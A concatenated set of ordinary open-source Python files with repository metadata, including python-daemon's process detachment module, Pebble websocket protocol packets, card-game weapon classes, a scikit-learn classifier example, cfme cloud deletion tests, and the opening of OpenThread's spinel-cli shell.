else:
params = dict((k, v) for k, v in kwargs.items() if not isinstance(v, ClauseElement))
params.update(defaults or {})
instance = model(**params)
session.add(instance)
session.commit()
return instance, True
|
Haikson/sitemap-generator
|
pysitemap/db.py
|
Python
|
apache-2.0
| 852
|
# -*- coding: utf-8 -*-
from __future__ import print_function
# daemon/daemon.py
# Part of python-daemon, an implementation of PEP 3143.
#
# Copyright © 2008–2010 Ben Finney <ben+python@benfinney.id.au>
# Copyright © 2007–2008 Robert Niederreiter, Jens Klein
# Copyright © 2004–2005 Chad J. Schroeder
# Copyright © 2003 Clark Evans
# Copyright © 2002 Noah Spurrier
# Copyright © 2001 Jürgen Hermann
#
# This is free software: you may copy, modify, and/or distribute this work
# under the terms of the Python Software Foundation License, version 2 or
# later as published by the Python Software Foundation.
# No warranty expressed or implied. See the file LICENSE.PSF-2 for details.
""" Daemon process behaviour.
"""
import os
import sys
import resource
import errno
import signal
import socket
import atexit
class DaemonError(Exception):
""" Base exception class for errors from this module. """
class DaemonOSEnvironmentError(DaemonError, OSError):
""" Exception raised when daemon OS environment setup receives error. """
class DaemonProcessDetachError(DaemonError, OSError):
""" Exception raised when process detach fails. """
class DaemonContext(object):
""" Context for turning the current program into a daemon process.
A `DaemonContext` instance represents the behaviour settings and
process context for the program when it becomes a daemon. The
behaviour and environment is customised by setting options on the
instance, before calling the `open` method.
Each option can be passed as a keyword argument to the `DaemonContext`
constructor, or subsequently altered by assigning to an attribute on
the instance at any time prior to calling `open`. That is, for
options named `wibble` and `wubble`, the following invocation::
foo = daemon.DaemonContext(wibble=bar, wubble=baz)
foo.open()
is equivalent to::
foo = daemon.DaemonContext()
foo.wibble = bar
foo.wubble = baz
foo.open()
The following options are defined.
`files_preserve`
:Default: ``None``
List of files that should *not* be closed when starting the
daemon. If ``None``, all open file descriptors will be closed.
Elements of the list are file descriptors (as returned by a file
object's `fileno()` method) or Python `file` objects. Each
specifies a file that is not to be closed during daemon start.
`chroot_directory`
:Default: ``None``
Full path to a directory to set as the effective root directory of
the process. If ``None``, specifies that the root directory is not
to be changed.
`working_directory`
:Default: ``'/'``
Full path of the working directory to which the process should
change on daemon start.
Since a filesystem cannot be unmounted if a process has its
current working directory on that filesystem, this should either
be left at default or set to a directory that is a sensible “home
directory” for the daemon while it is running.
`umask`
:Default: ``0``
File access creation mask (“umask”) to set for the process on
daemon start.
Since a process inherits its umask from its parent process,
starting the daemon will reset the umask to this value so that
files are created by the daemon with access modes as it expects.
`pidfile`
:Default: ``None``
Context manager for a PID lock file. When the daemon context opens
and closes, it enters and exits the `pidfile` context manager.
`detach_process`
:Default: ``None``
If ``True``, detach the process context when opening the daemon
context; if ``False``, do not detach.
If unspecified (``None``) during initialisation of the instance,
this will be set to ``True`` by default, and ``False`` only if
detaching the process is determined to be redundant; for example,
in the case when the process was started by `init`, by `initd`, or
by `inetd`.
`signal_map`
:Default: system-dependent
Mapping from operating system signals to callback actions.
The mapping is used when the daemon context opens, and determines
the action for each signal's signal handler:
* A value of ``None`` will ignore the signal (by setting the
signal action to ``signal.SIG_IGN``).
* A string value will be used as the name of an attribute on the
``DaemonContext`` instance. The attribute's value will be used
as the action for the signal handler.
* Any other value will be used as the action for the
signal handler. See the ``signal.signal`` documentation
for details of the signal handler interface.
The default value depends on which signals are defined on the
running system. Each item from the list below whose signal is
actually defined in the ``signal`` module will appear in the
default map:
* ``signal.SIGTTIN``: ``None``
* ``signal.SIGTTOU``: ``None``
* ``signal.SIGTSTP``: ``None``
* ``signal.SIGTERM``: ``'terminate'``
Depending on how the program will interact with its child
processes, it may need to specify a signal map that
includes the ``signal.SIGCHLD`` signal (received when a
child process exits). See the specific operating system's
documentation for more detail on how to determine what
circumstances dictate the need for signal handlers.
`uid`
:Default: ``os.getuid()``
`gid`
:Default: ``os.getgid()``
The user ID (“UID”) value and group ID (“GID”) value to switch
the process to on daemon start.
The default values, the real UID and GID of the process, will
relinquish any effective privilege elevation inherited by the
process.
`prevent_core`
:Default: ``True``
If true, prevents the generation of core files, in order to avoid
leaking sensitive information from daemons run as `root`.
`stdin`
:Default: ``None``
`stdout`
:Default: ``None``
`stderr`
:Default: ``None``
Each of `stdin`, `stdout`, and `stderr` is a file-like object
which will be used as the new file for the standard I/O stream
`sys.stdin`, `sys.stdout`, and `sys.stderr` respectively. The file
should therefore be open, with a minimum of mode 'r' in the case
of `stdin`, and mode 'w+' in the case of `stdout` and `stderr`.
If the object has a `fileno()` method that returns a file
descriptor, the corresponding file will be excluded from being
closed during daemon start (that is, it will be treated as though
it were listed in `files_preserve`).
If ``None``, the corresponding system stream is re-bound to the
file named by `os.devnull`.
"""
def __init__(
self,
chroot_directory=None,
working_directory='/',
umask=0,
uid=None,
gid=None,
prevent_core=True,
detach_process=None,
files_preserve=None,
pidfile=None,
stdin=None,
stdout=None,
stderr=None,
signal_map=None):
""" Set up a new instance. """
self.chroot_directory = chroot_directory
self.working_directory = working_directory
self.umask = umask
self.prevent_core = prevent_core
self.files_preserve = files_preserve
self.pidfile = pidfile
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
if uid is None:
uid = os.getuid()
self.uid = uid
if gid is None:
gid = os.getgid()
self.gid = gid
if detach_process is None:
detach_process = is_detach_process_context_required()
self.detach_process = detach_process
if signal_map is None:
signal_map = make_default_signal_map()
self.signal_map = signal_map
self._is_open = False
@property
def is_open(self):
""" ``True`` if the instance is currently open. """
return self._is_open
def open(self):
""" Become a daemon process.
:Return: ``None``
Open the daemon context, turning the current program into a daemon
process. This performs the following steps:
* If this instance's `is_open` property is true, return
immediately. This makes it safe to call `open` multiple times on
an instance.
* If the `prevent_core` attribute is true, set the resource limits
for the process to prevent any core dump from the process.
* If the `chroot_directory` attribute is not ``None``, set the
effective root directory of the process to that directory (via
`os.chroot`).
This allows running the daemon process inside a “chroot gaol”
as a means of limiting the system's exposure to rogue behaviour
by the process. Note that the specified directory needs to
already be set up for this purpose.
* Set the process UID and GID to the `uid` and `gid` attribute
values.
* Close all open file descriptors. This excludes those listed in
the `files_preserve` attribute, and those that correspond to the
`stdin`, `stdout`, or `stderr` attributes.
* Change current working directory to the path specified by the
`working_directory` attribute.
* Reset the file access creation mask to the value specified by
the `umask` attribute.
* If the `detach_process` option is true, detach the current
process into its own process group, and disassociate from any
controlling terminal.
* Set signal handlers as specified by the `signal_map` attribute.
* If any of the attributes `stdin`, `stdout`, `stderr` are not
``None``, bind the system streams `sys.stdin`, `sys.stdout`,
and/or `sys.stderr` to the files represented by the
corresponding attributes. Where the attribute has a file
descriptor, the descriptor is duplicated (instead of re-binding
the name).
* If the `pidfile` attribute is not ``None``, enter its context
manager.
* Mark this instance as open (for the purpose of future `open` and
`close` calls).
* Register the `close` method to be called during Python's exit
processing.
When the function returns, the running program is a daemon
process.
"""
if self.is_open:
return
if self.chroot_directory is not None:
change_root_directory(self.chroot_directory)
if self.prevent_core:
prevent_core_dump()
change_file_creation_mask(self.umask)
change_working_directory(self.working_directory)
change_process_owner(self.uid, self.gid)
if self.detach_process:
detach_process_context()
signal_handler_map = self._make_signal_handler_map()
set_signal_handlers(signal_handler_map)
exclude_fds = self._get_exclude_file_descriptors()
close_all_open_files(exclude=exclude_fds)
redirect_stream(sys.stdin, self.stdin)
redirect_stream(sys.stdout, self.stdout)
redirect_stream(sys.stderr, self.stderr)
if self.pidfile is not None:
self.pidfile.__enter__()
self._is_open = True
register_atexit_function(self.close)
def __enter__(self):
""" Context manager entry point. """
self.open()
return self
def close(self):
""" Exit the daemon process context.
:Return: ``None``
Close the daemon context. This performs the following steps:
* If this instance's `is_open` property is false, return
immediately. This makes it safe to call `close` multiple times
on an instance.
* If the `pidfile` attribute is not ``None``, exit its context
manager.
* Mark this instance as closed (for the purpose of future `open`
and `close` calls).
"""
if not self.is_open:
return
if self.pidfile is not None:
# Follow the interface for telling a context manager to exit,
# <URL:http://docs.python.org/library/stdtypes.html#typecontextmanager>.
self.pidfile.__exit__(None, None, None)
self._is_open = False
def __exit__(self, exc_type, exc_value, traceback):
""" Context manager exit point. """
self.close()
def terminate(self, signal_number, stack_frame):
""" Signal handler for end-process signals.
:Return: ``None``
Signal handler for the ``signal.SIGTERM`` signal. Performs the
following step:
* Raise a ``SystemExit`` exception explaining the signal.
"""
exception = SystemExit(
"Terminating on signal %(signal_number)r" % vars())
raise exception
def _get_exclude_file_descriptors(self):
""" Return the set of file descriptors to exclude closing.
Returns a set containing the file descriptors for the
items in `files_preserve`, and also each of `stdin`,
`stdout`, and `stderr`:
* If the item is ``None``, it is omitted from the return
set.
* If the item has a ``fileno()`` method, that method's
return value is in the return set.
* Otherwise, the item is in the return set verbatim.
"""
files_preserve = self.files_preserve
if files_preserve is None:
files_preserve = []
files_preserve.extend(
item for item in [self.stdin, self.stdout, self.stderr]
if hasattr(item, 'fileno'))
exclude_descriptors = set()
for item in files_preserve:
if item is None:
continue
if hasattr(item, 'fileno'):
exclude_descriptors.add(item.fileno())
else:
exclude_descriptors.add(item)
return exclude_descriptors
def _make_signal_handler(self, target):
""" Make the signal handler for a specified target object.
If `target` is ``None``, returns ``signal.SIG_IGN``. If
`target` is a string, returns the attribute of this
instance named by that string. Otherwise, returns `target`
itself.
"""
if target is None:
result = signal.SIG_IGN
elif isinstance(target, str):
name = target
result = getattr(self, name)
else:
result = target
return result
def _make_signal_handler_map(self):
""" Make the map from signals to handlers for this instance.
Constructs a map from signal numbers to handlers for this
context instance, suitable for passing to
`set_signal_handlers`.
"""
signal_handler_map = dict(
(signal_number, self._make_signal_handler(target))
for (signal_number, target) in self.signal_map.items())
return signal_handler_map
def change_working_directory(directory):
""" Change the working directory of this process.
"""
try:
os.chdir(directory)
except Exception as exc:
error = DaemonOSEnvironmentError(
"Unable to change working directory (%s)" % exc)
raise error
def change_root_directory(directory):
""" Change the root directory of this process.
Sets the current working directory, then the process root
directory, to the specified `directory`. Requires appropriate
OS privileges for this process.
"""
try:
os.chdir(directory)
os.chroot(directory)
except Exception as exc:
error = DaemonOSEnvironmentError(
"Unable to change root directory (%s)" % exc)
raise error
def change_file_creation_mask(mask):
""" Change the file creation mask for this process.
"""
try:
os.umask(mask)
except Exception as exc:
error = DaemonOSEnvironmentError(
"Unable to change file creation mask (%s)" % exc)
raise error
def change_process_owner(uid, gid):
""" Change the owning UID and GID of this process.
Sets the GID then the UID of the process (in that order, to
avoid permission errors) to the specified `gid` and `uid`
values. Requires appropriate OS privileges for this process.
"""
try:
os.setgid(gid)
os.setuid(uid)
except Exception as exc:
error = DaemonOSEnvironmentError(
"Unable to change file creation mask (%s)" % exc)
raise error
def prevent_core_dump():
""" Prevent this process from generating a core dump.
Sets the soft and hard limits for core dump size to zero. On
Unix, this prevents the process from creating core dump
altogether.
"""
core_resource = resource.RLIMIT_CORE
try:
# Ensure the resource limit exists on this platform, by requesting
# its current value
resource.getrlimit(core_resource)
except ValueError as exc:
error = DaemonOSEnvironmentError(
"System does not support RLIMIT_CORE resource limit (%s)" % exc)
raise error
# Set hard and soft limits to zero, i.e. no core dump at all
core_limit = (0, 0)
resource.setrlimit(core_resource, core_limit)
def detach_process_context():
""" Detach the process context from parent and session.
Detach from the parent process and session group, allowing the
parent to exit while this process continues running.
Reference: “Advanced Programming in the Unix Environment”,
section 13.3, by W. Richard Stevens, published 1993 by
Addison-Wesley.
"""
def fork_then_exit_parent(error_message):
""" Fork a child process, then exit the parent process.
If the fork fails, raise a ``DaemonProcessDetachError``
with ``error_message``.
"""
try:
pid = os.fork()
if pid > 0:
# pylint: disable=W0212
os._exit(0)
except OSError as exc:
error = DaemonProcessDetachError(
"%(error_message)s: [%(exc_errno)d] %(exc_strerror)s" % {
'error_message': error_message,
'exc_errno': exc.errno,
'exc_strerror': exc.strerror})
raise error
fork_then_exit_parent(error_message="Failed first fork")
os.setsid()
fork_then_exit_parent(error_message="Failed second fork")
def is_process_started_by_init():
""" Determine if the current process is started by `init`.
The `init` process has the process ID of 1; if that is our
parent process ID, return ``True``, otherwise ``False``.
"""
result = False
init_pid = 1
if os.getppid() == init_pid:
result = True
return result
def is_socket(fd):
""" Determine if the file descriptor is a socket.
Return ``False`` if querying the socket type of `fd` raises an
error; otherwise return ``True``.
"""
result = False
file_socket = socket.fromfd(fd, socket.AF_INET, socket.SOCK_RAW)
try:
file_socket.getsockopt(
socket.SOL_SOCKET, socket.SO_TYPE)
except socket.error as exc:
exc_errno = exc.args[0]
if exc_errno == errno.ENOTSOCK:
# Socket operation on non-socket
pass
else:
# Some other socket error
result = True
else:
# No error getting socket type
result = True
return result
def is_process_started_by_superserver():
""" Determine if the current process is started by the superserver.
The internet superserver creates a network socket, and
attaches it to the standard streams of the child process. If
that is the case for this process, return ``True``, otherwise
``False``.
"""
result = False
stdin_fd = sys.__stdin__.fileno()
if is_socket(stdin_fd):
result = True
return result
def is_detach_process_context_required():
""" Determine whether detaching process context is required.
Return ``True`` if the process environment indicates the
process is already detached:
* Process was started by `init`; or
* Process was started by `inetd`.
"""
result = True
if is_process_started_by_init() or is_process_started_by_superserver():
result = False
return result
def close_file_descriptor_if_open(fd):
""" Close a file descriptor if already open.
Close the file descriptor `fd`, suppressing an error in the
case the file was not open.
"""
try:
os.close(fd)
except OSError as exc:
if exc.errno == errno.EBADF:
# File descriptor was not open
pass
else:
error = DaemonOSEnvironmentError(
"Failed to close file descriptor %(fd)d"
" (%(exc)s)" % {'fd': fd, 'exc': exc})
raise error
MAXFD = 2048
def get_maximum_file_descriptors():
""" Return the maximum number of open file descriptors for this process.
Return the process hard resource limit of maximum number of
open file descriptors. If the limit is “infinity”, a default
value of ``MAXFD`` is returned.
"""
limits = resource.getrlimit(resource.RLIMIT_NOFILE)
result = limits[1]
if result == resource.RLIM_INFINITY:
result = MAXFD
return result
def close_all_open_files(exclude=None):
""" Close all open file descriptors.
Closes every file descriptor (if open) of this process. If
specified, `exclude` is a set of file descriptors to *not*
close.
"""
if exclude is None:
exclude = set()
maxfd = get_maximum_file_descriptors()
for fd in reversed(range(maxfd)):
if fd not in exclude:
close_file_descriptor_if_open(fd)
def redirect_stream(system_stream, target_stream):
""" Redirect a system stream to a specified file.
`system_stream` is a standard system stream such as
``sys.stdout``. `target_stream` is an open file object that
should replace the corresponding system stream object.
If `target_stream` is ``None``, defaults to opening the
operating system's null device and using its file descriptor.
"""
if target_stream is None:
target_fd = os.open(os.devnull, os.O_RDWR)
else:
target_fd = target_stream.fileno()
os.dup2(target_fd, system_stream.fileno())
def make_default_signal_map():
""" Make the default signal map for this system.
The signals available differ by system. The map will not
contain any signals not defined on the running system.
"""
name_map = {
'SIGTSTP': None,
'SIGTTIN': None,
'SIGTTOU': None,
'SIGTERM': 'terminate',
}
signal_map = dict(
(getattr(signal, name), target)
for (name, target) in name_map.items()
if hasattr(signal, name))
return signal_map
def set_signal_handlers(signal_handler_map):
""" Set the signal handlers as specified.
The `signal_handler_map` argument is a map from signal number
to signal handler. See the `signal` module for details.
"""
for (signal_number, handler) in signal_handler_map.items():
signal.signal(signal_number, handler)
def register_atexit_function(func):
""" Register a function for processing at program exit.
The function `func` is registered for a call with no arguments
at program exit.
"""
atexit.register(func)
|
candlepin/virt-who
|
virtwho/daemon/daemon.py
|
Python
|
gpl-2.0
| 25,080
|
from __future__ import absolute_import
__author__ = 'katharine'
from six import iteritems
from enum import IntEnum
from libpebble2.protocol.base import PebblePacket
from libpebble2.protocol.base.types import *
class WebSocketRelayFromWatch(PebblePacket):
payload = BinaryArray()
class WebSocketRelayToWatch(PebblePacket):
payload = BinaryArray()
class WebSocketPhoneAppLog(PebblePacket):
payload = FixedString()
class WebSocketPhoneServerLog(PebblePacket):
payload = BinaryArray()
class WebSocketInstallBundle(PebblePacket):
pbw = BinaryArray()
class WebSocketInstallStatus(PebblePacket):
class StatusCode(IntEnum):
Success = 0x00
Failed = 0x01
status = Uint8()
class WebSocketPhoneInfoRequest(PebblePacket):
version = Uint8(default=0x00)
class WebSocketInstallPhoneInfoResponse(PebblePacket):
payload = BinaryArray()
class WebSocketConnectionStatusUpdate(PebblePacket):
class StatusCode(IntEnum):
Connected = 0xff
Disconnected = 0x00
status = Uint8()
class WebSocketProxyConnectionStatusUpdate(PebblePacket):
class StatusCode(IntEnum):
Connected = 0xff
Disconnected = 0x00
status = Uint8()
class WebSocketProxyAuthenticationRequest(PebblePacket):
token = PascalString()
class WebSocketProxyAuthenticationResponse(PebblePacket):
class StatusCode(IntEnum):
Success = 0x00
Failed = 0x01
status = Uint8()
class AppConfigSetup(PebblePacket):
pass
class AppConfigResponse(PebblePacket):
length = Uint32()
data = FixedString(length=length)
class AppConfigCancelled(PebblePacket):
pass
class AppConfigURL(PebblePacket):
length = Uint32()
data = FixedString(length=length)
class WebSocketPhonesimAppConfig(PebblePacket):
command = Uint8()
config = Union(command, {
0x01: AppConfigSetup,
0x02: AppConfigResponse,
0x03: AppConfigCancelled,
})
class WebSocketPhonesimConfigResponse(PebblePacket):
command = Uint8()
config = Union(command, {
0x01: AppConfigURL
})
class WebSocketRelayQemu(PebblePacket):
protocol = Uint8()
data = BinaryArray()
class InsertPin(PebblePacket):
json = FixedString()
class DeletePin(PebblePacket):
uuid = FixedString(36)
class WebSocketTimelinePin(PebblePacket):
command = Uint8()
data = Union(command, {
0x01: InsertPin,
0x02: DeletePin
})
class WebSocketTimelineResponse(PebblePacket):
class Status(IntEnum):
Succeeded = 0x00
Failed = 0x01
status = Uint8(enum=Status)
to_watch = {
0x01: WebSocketRelayToWatch,
0x04: WebSocketInstallBundle,
0x06: WebSocketPhoneInfoRequest,
0x09: WebSocketProxyAuthenticationRequest,
0x0a: WebSocketPhonesimAppConfig,
0x0b: WebSocketRelayQemu,
0x0c: WebSocketTimelinePin
}
from_watch = {
0x00: WebSocketRelayFromWatch,
0x01: WebSocketRelayToWatch,
0x02: WebSocketPhoneAppLog,
0x03: WebSocketPhoneServerLog,
0x05: WebSocketInstallStatus,
0x06: WebSocketPhoneInfoRequest,
0x07: WebSocketConnectionStatusUpdate,
0x08: WebSocketProxyConnectionStatusUpdate,
0x09: WebSocketProxyAuthenticationResponse,
0x0a: WebSocketPhonesimConfigResponse,
0x0c: WebSocketTimelineResponse,
}
endpoints = {v: k for k, v in iteritems(to_watch)}
endpoints.update({v: k for k, v in iteritems(from_watch)})
|
susundberg/pebble-linux-remote
|
host_python/libpebble2/communication/transports/websocket/protocol.py
|
Python
|
gpl-2.0
| 3,434
|
from SDWLE.cards.base import WeaponCard
from SDWLE.game_objects import Weapon
from SDWLE.tags.action import Damage
from SDWLE.tags.base import Battlecry, Buff
from SDWLE.tags.condition import GreaterThan, IsType
from SDWLE.tags.selector import CharacterSelector, UserPicker, Count, MinionSelector
from SDWLE.tags.status import ChangeAttack
from SDWLE.constants import CHARACTER_CLASS, CARD_RARITY, MINION_TYPE
class WickedKnife(WeaponCard):
def __init__(self):
super().__init__("Wicked Knife", 1, CHARACTER_CLASS.ROGUE, CARD_RARITY.FREE, False)
def create_weapon(self, player):
return Weapon(1, 2)
class AssassinsBlade(WeaponCard):
def __init__(self):
super().__init__("Assassin's Blade", 5, CHARACTER_CLASS.ROGUE, CARD_RARITY.COMMON)
def create_weapon(self, player):
return Weapon(3, 4)
class PerditionsBlade(WeaponCard):
def __init__(self):
super().__init__("Perdition's Blade", 3, CHARACTER_CLASS.ROGUE, CARD_RARITY.RARE,
battlecry=Battlecry(Damage(1), CharacterSelector(None, picker=UserPicker())),
combo=Battlecry(Damage(2), CharacterSelector(None, picker=UserPicker())))
def create_weapon(self, player):
return Weapon(2, 2)
class CogmastersWrench(WeaponCard):
def __init__(self):
super().__init__("Cogmaster's Wrench", 3, CHARACTER_CLASS.ROGUE, CARD_RARITY.EPIC)
def create_weapon(self, player):
return Weapon(1, 3, buffs=[Buff(ChangeAttack(2), GreaterThan(Count(MinionSelector(IsType(MINION_TYPE.MECH))),
value=0))])
|
jomyhuang/sdwle
|
SDWLE/cards_copy/weapons/rogue.py
|
Python
|
mit
| 1,651
|
"""Classification example using sci-kit learn k-nearest
"""
import pandas as pd
import numpy as np
from sklearn import cross_validation, neighbors
# read data, replace missing values, drop useless id column
df = pd.read_csv('breast-cancer-wisconsin.data')
df.replace('?', -99999, inplace=True)
df.drop(['id'], 1, inplace=True)
# x = columns excluding class/features; y = class/label
x = np.array(df.drop(['class'], 1))
y = np.array(df['class'])
# split data
x_train, x_test, y_train, y_test = cross_validation.train_test_split(x, y, test_size=0.2)
# train and fit classifier using sci-kit k-neighbors
clf = neighbors.KNeighborsClassifier()
clf.fit(x_train, y_train)
# test accuracy
accuracy = clf.score(x_test, y_test)
print(accuracy)
# made up point to test the classifier
example_measures = np.array([[4, 2, 1, 1, 1, 2, 3, 2, 1], [4, 2, 1, 2, 2, 2, 3, 2, 1]])
example_measures = example_measures.reshape(len(example_measures), -1)
prediction = clf.predict(example_measures)
print(prediction)
|
FelixPM/Learning-Machine-Learning
|
sentdex/classification.py
|
Python
|
mit
| 1,002
|
# -*- coding: utf-8 -*-
import pytest
from cfme import test_requirements
from cfme.cloud.stack import Stack
from cfme.common.vm import VM
from cfme.fixtures import pytest_selenium as sel
from cfme.web_ui import toolbar, Quadicon
from utils import testgen
from utils.appliance.implementations.ui import navigate_to
from utils.version import current_version
def pytest_generate_tests(metafunc):
# Filter out providers without templates defined
argnames, argvalues, idlist = testgen.cloud_providers(metafunc, required_fields=['remove_test'])
testgen.parametrize(metafunc, argnames, argvalues, ids=idlist, scope="module")
pytestmark = [pytest.mark.tier(2),
test_requirements.general_ui]
@pytest.fixture(scope="module")
def set_grid():
sel.force_navigate("clouds_images")
toolbar.select('Grid View')
def reset():
# TODO replace this navigation with navmazing when cloud images supports it
sel.force_navigate("clouds_images")
toolbar.select('List View')
# TODO take generic object instead of stack when instance and image support navmazing destinations
def refresh_and_wait(provider, stack):
provider.refresh_provider_relationships()
navigate_to(stack, 'All')
if not sel.is_displayed(Quadicon(stack.name, stack.quad_name)):
stack.wait_for_appear()
def test_delete_instance(setup_provider, provider):
""" Tests delete instance
Metadata:
test_flag: delete_object
"""
instance_name = provider.data['remove_test']['instance']
test_instance = VM.factory(instance_name, provider)
test_instance.delete(from_details=False)
test_instance.wait_for_delete()
provider.refresh_provider_relationships()
test_instance.wait_to_appear()
def test_delete_image(setup_provider, provider, set_grid, request):
""" Tests delete image
Metadata:
test_flag: delete_object
"""
# TODO as of 5.6+ clouds_images is no longer in the menu tree
# Refactor to navigate via clouds instances accordion
image_name = provider.data['remove_test']['image']
test_image = VM.factory(image_name, provider, template=True)
test_image.delete(from_details=False)
test_image.wait_for_delete()
provider.refresh_provider_relationships()
test_image.wait_to_appear()
request.addfinalizer(reset)
@pytest.mark.uncollectif(lambda: current_version() < "5.4")
def test_delete_stack(setup_provider, provider, provisioning, request):
""" Tests delete stack
Metadata:
test_flag: delete_object
"""
stack = Stack(provisioning['stack'])
refresh_and_wait(provider, stack)
stack.delete()
navigate_to(stack, 'All')
assert lambda: not sel.is_displayed(Quadicon(stack.name, stack.quad_name))
|
kzvyahin/cfme_tests
|
cfme/tests/cloud/test_delete_cloud_object.py
|
Python
|
gpl-2.0
| 2,744
|
#!/usr/bin/env python3
#
# Copyright (c) 2016-2019, The OpenThread Authors.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Shell tool for controlling OpenThread NCP instances.
"""
import os
import sys
import time
import traceback
import random
import importlib
import optparse
import binascii
import socket
import struct
import string
import textwrap
import logging
import logging.config
import logging.handlers
from cmd import Cmd
from spinel.const import SPINEL
from spinel.const import kThread
from spinel.codec import WpanApi
from spinel.codec import SpinelCodec
from spinel.stream import StreamOpen
from spinel.tun import TunInterface
import spinel.config as CONFIG
import spinel.util as util
import ipaddress
__copyright__ = "Copyright (c) 2016 The OpenThread Authors."
__version__ = "0.1.0"
NETWORK_PROMPT = "spinel-cli"
import io
import spinel.ipv6 as ipv6
import spinel.common as common
DEFAULT_BAUDRATE = 115200
class IcmpV6Factory(object):
ipv6_factory = ipv6.IPv6PacketFactory(
ehf={
0:
ipv6.HopByHopFactory(
hop_by_hop_options_factory=ipv6.HopByHopOptionsFactory(
options_factories={109: ipv6.MPLOptionFactory()}))
},
ulpf={
58:
ipv6.ICMPv6Factory(
body_factories={129: ipv6.ICMPv6EchoBodyFactory()})
})
def _any_identifier(self):
return random.getrandbits(16)
def _seq_number(self):
seq_number = 0
while True:
yield seq_number
seq_number += 1
seq_number if seq_number < (1 << 16) else 0
def build_icmp_echo_request(self,
src,
dst,
data,
hop_limit=64,
identifier=None,
sequence_number=None):
identifier = self._any_identifier(
) if identifier is None else identifier
sequence_number = next(
self._seq_number()) if sequence_number is None else sequence_number
ping_req = ipv6.IPv6Packet(
ipv6_header=ipv6.IPv6Header(source_address=src,
destination_address=dst,
hop_limit=hop_limit),
upper_layer_protocol=ipv6.ICMPv6(
header=ipv6.ICMPv6Header(_type=ipv6.ICMP_ECHO_REQUEST, code=0),
body=ipv6.ICMPv6EchoBody(identifier=identifier,
sequence_number=sequence_number,
data=data)))
return ping_req.to_bytes()
def from_bytes(self, data):
return self.ipv6_factory.parse(io.BytesIO(data), common.MessageInfo())
class SpinelCliCmd(Cmd, SpinelCodec):
"""
A command line shell for controlling OpenThread NCP nodes
via the Spinel protocol.
"""
VIRTUAL_TIME = os.getenv('VIRTUAL_TIME') == '1'
icmp_factory = IcmpV6Factory()
def _init_virtual_time(self):
"""
compute addresses used for virtual time.
"""
BASE_PORT = 9000
MAX_NODES = 34
PORT_OFFSET = int(os.getenv("PORT_OFFSET", "0"))
self._addr = ('127.0.0.1', BASE_PORT * 2 + MAX_NODES * PORT_OFFSET)
self._simulator_addr = ('127.0.0.1',
BASE_PORT + MAX_NODES * PORT_OFFSET)
def __init__(self, stream, nodeid, vendor_module, *_a, **kw):
if self.VIRTUAL_TIME:
self._init_virtual_time()
self.nodeid = nodeid
self.tun_if = None
self.wpan_api = WpanApi(stream, nodeid, vendor_module=vendor_module)
self.wpan_api.queue_register(SPINEL.HEADER_DEFAULT)
self.wpan_api.callback_register(SPINEL.PROP_STREAM_NET,
self.wpan_callback)
Cmd.__init__(self)
Cmd.identchars = string.ascii_letters + string.digits + '-'
if sys.stdin.isatty():
self.prompt = NETWORK_PROMPT + " > "
else:
self.use_rawinput = 0
self.prompt = ""
SpinelCliCmd.command_names.sort()
self.history_filename = os.path.expanduser("~/.spinel-cli-history")
try:
import readline
try:
readline.read_history_file(self.history_filename)
except IOError:
pass
except ImportError:
print("Module readline unavailable")
else:
import rlcompleter
if readline.__doc__ and 'libedit' in readline.__doc__:
readline.parse_and_bind('bind ^I rl_complete')
else:
readline.parse_and_bind('tab: complete')
if hasattr(stream, 'pipe'):
self.wpan_api.queue_wait_for_prop(SPINEL.PROP_LAST_STATUS,
SPINEL.HEADER_ASYNC)
self.prop_set_value(SPINEL.PROP_IPv6_ICMP_PING_OFFLOAD, 1)
self.prop_set_value(SPINEL.PROP_THREAD_RLOC16_DEBUG_PASSTHRU, 1)
command_names = [
# Shell commands
'exit',
'quit',
'clear',
'history',
'debug',
'debug-mem',
'v',
'h',
'q',
# OpenThread CLI commands
'help',
'bufferinfo',
'channel',
'child',
'childmax',
'childtimeout',
'commissioner',
'contextreusedelay',
'counters',
'diag',
'discover',
'eidcache',
'extaddr',
'extpanid',
'ifconfig',
'ipaddr',
'joiner',
'keysequence',
'leaderdata',
'leaderweight',
'mac',
'macfilter',
'mfg',
'mode',
'netdata',
'networkidtimeout',
'networkkey',
'networkname',
'panid',
'parent',
'ping',
'prefix',
'releaserouterid',
'reset',
'rloc16',
'route',
'router',
'routerselectionjitter',
'routerupgradethreshold',
'routerdowngradethreshold',
'scan',
'state',
'thread',
'txpower',
'version',
'vendor',
# OpenThread Spinel-specific commands
'ncp-ml64',
'ncp-ll64',
'ncp-tun',
'ncp-raw',
'ncp-filter',
]
@classmethod
def wpan_callback(cls, prop, value, tid):
consumed = False
if prop == SPINEL.PROP_STREAM_NET:
consumed = True
try:
pkt = cls.icmp_factory.from_bytes(value)
if CONFIG.DEBUG_LOG_PKT:
CONFIG.LOGGER.debug(pkt)
timenow = int(round(time.time() * 1000)) & 0xFFFFFFFF
timestamp = (pkt.upper_layer_protocol.body.identifier << 16 |
pkt.upper_layer_protocol.body.sequence_number)
timedelta = (timenow - timestamp)
print("\n%d bytes from %s: icmp_seq=%d hlim=%d time=%dms" %
(len(pkt.upper_layer_protocol.body.data),
pkt.ipv6_header.source_address,
pkt.upper_layer_protocol.body.sequence_number,
pkt.ipv6_header.hop_limit, timedelta))
except RuntimeError:
pass
return consumed
@classmethod
def log(cls, text):
""" Common log handler. """
CONFIG.LOGGER.info(text)
def parseline(self, line):
cmd, arg, line = Cmd.parseline(self, line)
if cmd:
cmd = self.short_command_name(cmd)
line = cmd + ' ' + arg
return cmd, arg, line
def completenames(self, text, *ignored):
return [
name + ' '
for name in SpinelCliCmd.command_names
if name.startswith(text) or
self.short_command_name(name).startswith(text)
]
@classmethod
def short_command_name(cls, cmd):
return cmd.replace('-', '')
def postloop(self):
try:
import readline
try:
readline.write_history_file(self.history_filename)
except IOError:
pass
except ImportError:
pass
def prop_get_value(self, prop_id):
""" Blocking helper to return value for given propery identifier. """
return self.wpan_api.prop_get_value(prop_id)
def prop_set_value(self, prop_id, value, py_format='B'):
""" Blocking helper to set value for given propery identifier. """
return self.wpan_api.prop_set_value(prop_id, value, py_format)
